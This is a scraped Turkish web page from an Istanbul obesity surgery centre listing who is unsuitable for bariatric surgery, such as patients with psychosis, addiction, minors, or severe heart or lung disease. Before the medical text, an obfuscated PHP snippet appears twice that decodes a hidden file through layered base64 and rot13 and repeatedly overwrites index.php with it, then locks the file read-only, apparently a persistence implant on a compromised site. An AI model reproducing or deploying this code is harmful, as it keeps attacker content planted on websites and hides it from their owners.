$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Kimlere Uygun Değildir - İstanbul Obezite Cerrahisi Merkezi

Skip links

Kimlere Uygun Değildir

Öncelikle hastanın ameliyat sonrasında gerekli olan beslenme ve davranış değişikliklerine adapte olabilecek algılama kapasitesinde, mental yeterlilikte ve uyumlu olması şartı aranır. Dolayısıyla, mental retarde hastalarda, erişkin olmayan çocuklarda, psikoz düzeyinde akıl hastalığı olanlarda ve alkol veya madde bağımlılığı olan hastalarda obezite cerrahisi uygulanamaz. Psikyatrik problemleri olan hastalarda mutlaka psikyatristin onayı alınmalıdır.

Bunun dışında, laparoskopik cerrahiye engel yaratacak ağırlıkta kalp ve akciğer sorunu olanlarda da, açık ameliyatın riskleri ile sağlanabilecek faydaların çok iyi bir değerlendirmesi yapılmalıdır.

Yaş artık ameliyatlar için bir sınır olmaktan çıkmıştır. Hastanın genel sağlık durumu, ameliyattan sağlanabilecek faydalar ve hastanın motivasyon derecesi daha önemli kriterlerdir.

Bitnami